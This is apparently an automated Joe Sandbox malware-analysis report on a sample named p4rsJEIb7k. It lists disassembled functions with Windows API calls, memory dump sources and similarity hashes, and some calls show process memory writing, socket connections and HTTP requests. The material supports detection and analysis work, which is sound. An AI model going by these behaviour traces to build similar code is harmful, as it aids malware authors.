                                                                                                                • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C363
                                                                                                                • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C385
                                                                                                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C392
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: PrivateProfile$SectionWrite$String
                                                                                                                • String ID:
                                                                                                                • API String ID: 2832842796-0
                                                                                                                • Opcode ID: c76cc1094b5fb1fc43fcb7877a7661b5ae667b5fa7796de5023eb6f45200691f
                                                                                                                • Instruction ID: eb365ed5c03c4bb3a44f9ddbc5128f2f56e5f8affd5b6ace934fe40af23b551f
                                                                                                                • Opcode Fuzzy Hash: c76cc1094b5fb1fc43fcb7877a7661b5ae667b5fa7796de5023eb6f45200691f
                                                                                                                • Instruction Fuzzy Hash: 00318675240305ABD610DFA1DC85F9BB3A8AF84705F00891DF94497292D7B9E889CB94
                                                                                                                APIs
                                                                                                                • GetClientRect.USER32(?,?), ref: 00447997
                                                                                                                • GetCursorPos.USER32(?), ref: 004479A2
                                                                                                                • ScreenToClient.USER32(?,?), ref: 004479BE
                                                                                                                • WindowFromPoint.USER32(?,?), ref: 004479FF
                                                                                                                • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447A78
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Client$CursorFromPointProcRectScreenWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 1822080540-0
                                                                                                                • Opcode ID: c356f0f93048ebf3c0a873f2be17aa192b5fb9472fb724aa4a6a449873fe30ba
                                                                                                                • Instruction ID: e9c1e18ea4fcc9a2ad4b32cd349e8b57ec7287094a91df3c43d19f1875151664
                                                                                                                • Opcode Fuzzy Hash: c356f0f93048ebf3c0a873f2be17aa192b5fb9472fb724aa4a6a449873fe30ba
                                                                                                                • Instruction Fuzzy Hash: DE3188742082029BD710CF19D88596FB7A9EBC8714F144A1EF88097291D778EA57CBAA
                                                                                                                APIs
                                                                                                                • GetWindowRect.USER32(?,?), ref: 00447C1B
                                                                                                                • ScreenToClient.USER32(?,?), ref: 00447C39
                                                                                                                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C4C
                                                                                                                • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447C93
                                                                                                                • EndPaint.USER32(?,?), ref: 00447CD1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClientPaintRectRectangleScreenViewportWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 659298297-0
                                                                                                                • Opcode ID: a6d698a2242c6caf7091173c4181dadfabb51550506680b35635a03376f271bc
                                                                                                                • Instruction ID: 653bb342b0117225c29b14224c0e663a7b864e912777eddc33bb147bcfad3e12
                                                                                                                • Opcode Fuzzy Hash: a6d698a2242c6caf7091173c4181dadfabb51550506680b35635a03376f271bc
                                                                                                                • Instruction Fuzzy Hash: 8A3150706043019FE320CF15D9C8F7B7BE8EB89724F044A6EF994873A1D774A8468B69
                                                                                                                APIs
                                                                                                                • GetCursorPos.USER32(?), ref: 004478A7
                                                                                                                • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478C3
                                                                                                                • DefDlgProcW.USER32(?,0000007B,?,?,004A83D8,?,004A83D8,?), ref: 004478E7
                                                                                                                • GetCursorPos.USER32(?), ref: 00447935
                                                                                                                • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 0044795B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CursorMenuPopupTrack$Proc
                                                                                                                • String ID:
                                                                                                                • API String ID: 1300944170-0
                                                                                                                • Opcode ID: 00aabaf84d80e4f8c92fc7d2a6c816b999107077810d41e1d32a7af9c3da8c6b
                                                                                                                • Instruction ID: 600148c7f6f0e64f7aba5c2d0a58757112576a5c49d56a392ea253be37485a5b
                                                                                                                • Opcode Fuzzy Hash: 00aabaf84d80e4f8c92fc7d2a6c816b999107077810d41e1d32a7af9c3da8c6b
                                                                                                                • Instruction Fuzzy Hash: 2B31E475244204ABE214DB48DC48FABB7A5FBC9711F14491EF64483390D7B96C4BC779
                                                                                                                APIs
                                                                                                                • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                                                                • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                                                                • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                                                                                                                • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                                                                                                                • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                                                                  • Part of subcall function 004413F0: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0044140E
                                                                                                                  • Part of subcall function 004413F0: GetWindowLongW.USER32(?,000000F0), ref: 00441452
                                                                                                                  • Part of subcall function 004413F0: GetWindowLongW.USER32(?,000000F0), ref: 00441493
                                                                                                                  • Part of subcall function 004413F0: SendMessageW.USER32(019F1B28,000000F1,00000000,00000000), ref: 004414C6
                                                                                                                  • Part of subcall function 004413F0: SendMessageW.USER32(019F1B28,000000F1,00000001,00000000), ref: 004414F1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$EnableMessageSend$LongShow
                                                                                                                • String ID:
                                                                                                                • API String ID: 142311417-0
                                                                                                                • Opcode ID: 63a7105258867651d9446b65671e60b54e1f680e017c4d0f27b0fbeeb6060130
                                                                                                                • Instruction ID: 53ead31d82dc60d0a1ec6489c26700cf05fac79e8a5bf65a12bf69c5108a1aee
                                                                                                                • Opcode Fuzzy Hash: 63a7105258867651d9446b65671e60b54e1f680e017c4d0f27b0fbeeb6060130
                                                                                                                • Instruction Fuzzy Hash: 942105B07053809BF7148E28C8C47AFB7D0FB95345F08482EF981A6391DBAC9845C72E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                APIs
                                                                                                                • IsWindow.USER32(00000000), ref: 00459DEF
                                                                                                                • GetForegroundWindow.USER32 ref: 00459E07
                                                                                                                • GetDC.USER32(00000000), ref: 00459E44
                                                                                                                • GetPixel.GDI32(00000000,?,00000000), ref: 00459E4F
                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 00459E8B
                                                                                                                Similarity
                                                                                                                • API ID: Window$ForegroundPixelRelease
                                                                                                                APIs
                                                                                                                • WriteConsoleW.KERNEL32(FFFFFFFE,00000000,00000001,00000000,00000000,00000000,00000000,00000002,00000000), ref: 00425186
                                                                                                                • GetLastError.KERNEL32 ref: 00425199
                                                                                                                • GetConsoleOutputCP.KERNEL32(00000000,00000000,00000001,00000002,00000005,00000000,00000000,00000000,00000000,00000002,00000000), ref: 004251B9
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000), ref: 004251C0
                                                                                                                • WriteConsoleA.KERNEL32(FFFFFFFE,?,00000000,?,00000000), ref: 004251DC
                                                                                                                  • Part of subcall function 00426D55: CreateFileA.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00425169,00000000,00000000,00000002,00000000), ref: 00426D68
                                                                                                                Similarity
                                                                                                                • API ID: Console$Write$ByteCharCreateErrorFileLastMultiOutputWide
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004647A2: inet_addr.WSOCK32(?), ref: 004647C7
                                                                                                                • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 00464985
                                                                                                                • WSAGetLastError.WSOCK32(00000000,00000002,00000001,00000006,00000000), ref: 00464993
                                                                                                                • connect.WSOCK32(00000000,00000000,00000010,00000002,00000001,00000006,00000000), ref: 004649CD
                                                                                                                • WSAGetLastError.WSOCK32(00000000,00000000,00000000,00000010,00000002,00000001,00000006,00000000), ref: 004649F4
                                                                                                                • closesocket.WSOCK32(00000000,00000000,00000000,00000000,00000000,00000010,00000002,00000001,00000006,00000000), ref: 00464A07
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                                                                                                APIs
                                                                                                                • DeleteObject.GDI32(00000000), ref: 00447151
                                                                                                                • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                                                • SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                                                • BeginPath.GDI32(?), ref: 004471B7
                                                                                                                • SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                                                                Similarity
                                                                                                                • API ID: Object$Select$BeginCreateDeletePath
                                                                                                                APIs
                                                                                                                • Sleep.KERNEL32(00000000,00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043771E
                                                                                                                • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043773C
                                                                                                                • Sleep.KERNEL32(00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043775C
                                                                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,004448B6,0000000F,?), ref: 00437767
                                                                                                                Similarity
                                                                                                                • API ID: CounterPerformanceQuerySleep
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32 ref: 0046FD00
                                                                                                                • SendMessageW.USER32(?,0000104C,00000000,?), ref: 0046FD2E
                                                                                                                • SendMessageW.USER32(?,00001015,?,?), ref: 0046FD4B
                                                                                                                • DestroyIcon.USER32(?), ref: 0046FD58
                                                                                                                • DestroyIcon.USER32(?), ref: 0046FD5F
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$DestroyIcon
                                                                                                                APIs
                                                                                                                • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                                                                • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                Similarity
                                                                                                                • API ID: Destroy$DeleteObjectWindow$Icon
                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00460342
                                                                                                                • GetWindowTextW.USER32(00000000,00000100,00000100), ref: 00460357
                                                                                                                • MessageBeep.USER32(00000000), ref: 0046036D
                                                                                                                • KillTimer.USER32(?,0000040A), ref: 00460392
                                                                                                                • EndDialog.USER32(?,00000001), ref: 004603AB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3741023627-0
                                                                                                                • Opcode ID: 5e0545b8da8baa7cb8324f4116d33f6edaa60507eab9176a587cebaf75a8c25b
                                                                                                                • Instruction ID: 48c257e0c270193328064fa19c5b46d6a870d8092b70dfec968bdaebd9a60f08
                                                                                                                • Opcode Fuzzy Hash: 5e0545b8da8baa7cb8324f4116d33f6edaa60507eab9176a587cebaf75a8c25b
                                                                                                                • Instruction Fuzzy Hash: BE018831500300A7E7209B54DE5DBDB77A8BF44B05F00492EB681A25D0E7F8A584CB55
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,00001101,00000000,?), ref: 00455514
                                                                                                                • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: DeleteDestroyObject$IconMessageSendWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 1489400265-0
                                                                                                                • Opcode ID: fb8346e1cf28bbdc4ad062342734fe1bacbf25b41774fd01ae6266dc65fad9d1
                                                                                                                • Instruction ID: 68d82c845863845e83b9d92669df32d5d1b96a6c2c0272d07869f65424c05900
                                                                                                                • Opcode Fuzzy Hash: fb8346e1cf28bbdc4ad062342734fe1bacbf25b41774fd01ae6266dc65fad9d1
                                                                                                                • Instruction Fuzzy Hash: D9014F703006419BDB10EF65DED8A2A73A9FB44712B40455AFE05DB286DB78EC49CB68
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0043343D: InvalidateRect.USER32(?,00000000,00000001), ref: 004334BE
                                                                                                                • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                                                                • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                                                                                                                • String ID:
                                                                                                                • API String ID: 1042038666-0
                                                                                                                • Opcode ID: 920ee65d6839c6288c76afce6441748d32e1b72318fe83d584ccefe2da360159
                                                                                                                • Instruction ID: 707d1f3050e1f0ff98422ce5efa9f9a4d3559fdafbc0a23101ed238e91bf2869
                                                                                                                • Opcode Fuzzy Hash: 920ee65d6839c6288c76afce6441748d32e1b72318fe83d584ccefe2da360159
                                                                                                                • Instruction Fuzzy Hash: B2014B702006419BCB10AF65D9C8A2A33ACAF19322780456AFD05D7242DB28EC498B79
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                • String ID:
                                                                                                                • API String ID: 2625713937-0
                                                                                                                • Opcode ID: a89ec47609df172868659220a46891f09f78d761c189f4b7bb4a315096e7830c
                                                                                                                • Instruction ID: 1b0d13c7bbaa275692c81ef4a4760df4fcf6218f807946f7e03cce85d1463269
                                                                                                                • Opcode Fuzzy Hash: a89ec47609df172868659220a46891f09f78d761c189f4b7bb4a315096e7830c
                                                                                                                • Instruction Fuzzy Hash: F7F0A4751052019BD7508F18EC0C70E7FA8FB4F325F04462EEA19932E0DB781546CBAD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Default$|k
                                                                                                                • API String ID: 0-2254895183
                                                                                                                • Opcode ID: 404d7240c4bb856f681ff9cdf52c8ed6758caabbd7f7f5126ad75ded5c77f63b
                                                                                                                • Instruction ID: 39a525bc613f0e7e9485e4ea944b13d532e73913c0a35fc25f8fa2b96209a7b9
                                                                                                                • Opcode Fuzzy Hash: 404d7240c4bb856f681ff9cdf52c8ed6758caabbd7f7f5126ad75ded5c77f63b
                                                                                                                • Instruction Fuzzy Hash: 51F19F706083018BD714DF25C484A6BB7E5AF85314F64886FF885AB392D738EC55CB9B
                                                                                                                APIs
                                                                                                                • GetOpenFileNameW.COMDLG32(00000058), ref: 00466CFE
                                                                                                                • GetSaveFileNameW.COMDLG32(00000058), ref: 00466D9E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: FileName$OpenSave
                                                                                                                • String ID: X$HH
                                                                                                                • API String ID: 3924019920-1944015008
                                                                                                                • Opcode ID: 148ffd08a53066c169799d7010fd2328abbb1436974d200da898f01e024381e3
                                                                                                                • Instruction ID: 73e83d7ea4d12cbe09e247b0b8120e99e9ae8af51722f6ce2f45a1bbad6557a4
                                                                                                                • Opcode Fuzzy Hash: 148ffd08a53066c169799d7010fd2328abbb1436974d200da898f01e024381e3
                                                                                                                • Instruction Fuzzy Hash: D1C1B2715043408BC714EF65C981A9FB3E4BF84304F15892FF949AB292EB78E905CB9B
                                                                                                                APIs
                                                                                                                • CoInitialize.OLE32(00000000), ref: 0046CE18
                                                                                                                • CoCreateInstance.OLE32(00482A50,00000000,00000001,004828B0,?), ref: 0046CE31
                                                                                                                • CoUninitialize.OLE32 ref: 0046CE50
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: CreateInitializeInstanceUninitialize
                                                                                                                • String ID: .lnk
                                                                                                                • API String ID: 948891078-24824748
                                                                                                                • Opcode ID: cf95cfa125c39178dc1728bd48ca6ee468afe444b27fb378bb5b47a8cf5920ff
                                                                                                                • Instruction ID: 09ec1e36491b9dee8eccbfa157b0fc1a83632a56aae6c10d58f94140378ad3aa
                                                                                                                • Opcode Fuzzy Hash: cf95cfa125c39178dc1728bd48ca6ee468afe444b27fb378bb5b47a8cf5920ff
                                                                                                                • Instruction Fuzzy Hash: D3A1ABB5A042019FC704EF64C980E6BB7E9EF88714F14895EF8849B392D735EC45CBA6
                                                                                                                APIs
                                                                                                                • GetMenuItemInfoW.USER32(?,?), ref: 004538EF
                                                                                                                • SetMenuItemInfoW.USER32(00000011,?,00000000,?), ref: 004539C4
                                                                                                                • SetMenuDefaultItem.USER32(?,000000FF,00000000,?,?), ref: 004539E0
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: ItemMenu$Info$Default
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 1306138088-4108050209
                                                                                                                • Opcode ID: c8c2b72c749714a23e45c10816ef9459d7fe91b5f095051f547869ed1843acb9
                                                                                                                • Instruction ID: 97d09e0af2b4d046480d7fb626e7fa0667c22e7462995616ff61acde959b3bac
                                                                                                                • Opcode Fuzzy Hash: c8c2b72c749714a23e45c10816ef9459d7fe91b5f095051f547869ed1843acb9
                                                                                                                • Instruction Fuzzy Hash: 747118F15083015AD714DF65C881B6BB7E4EB98396F04491FFD8082292D7BCDA4CC7AA
                                                                                                                APIs
                                                                                                                • VariantInit.OLEAUT32(00000000), ref: 0042D2E0
                                                                                                                • VariantCopy.OLEAUT32(?,?), ref: 0042D2EE
                                                                                                                • VariantClear.OLEAUT32(00000000), ref: 0042D2FF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: Variant$ClearCopyInit
                                                                                                                • String ID: 4RH
                                                                                                                • API String ID: 1785138364-749298218
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseExecuteHandleShell
                                                                                                                • String ID: <$@
                                                                                                                • API String ID: 283469938-1426351568
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004374AF: WriteProcessMemory.KERNEL32(?,?,00000000,00000000,00000000,?,00461142,?), ref: 004374E2
                                                                                                                • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00438AB8
                                                                                                                  • Part of subcall function 00437472: ReadProcessMemory.KERNEL32(?,00000000,00000000,?,00000000,00000000,00460C33,?,00000000,?,00000202), ref: 004374A5
                                                                                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00438B2F
                                                                                                                • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 00438BAF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$MemoryProcess$ReadWrite
                                                                                                                • String ID: @
                                                                                                                • API String ID: 4055202900-2766056989
                                                                                                                APIs
                                                                                                                • GetMenuItemInfoW.USER32 ref: 0045F1B9
                                                                                                                • DeleteMenu.USER32(?,?,00000000), ref: 0045F218
                                                                                                                • DeleteMenu.USER32(?,?,00000000), ref: 0045F27A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Menu$Delete$InfoItem
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 135850232-4108050209
                                                                                                                APIs
                                                                                                                • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A7FE
                                                                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A851
                                                                                                                • HttpQueryInfoW.WININET ref: 0044A892
                                                                                                                  • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                                                                                                • String ID:
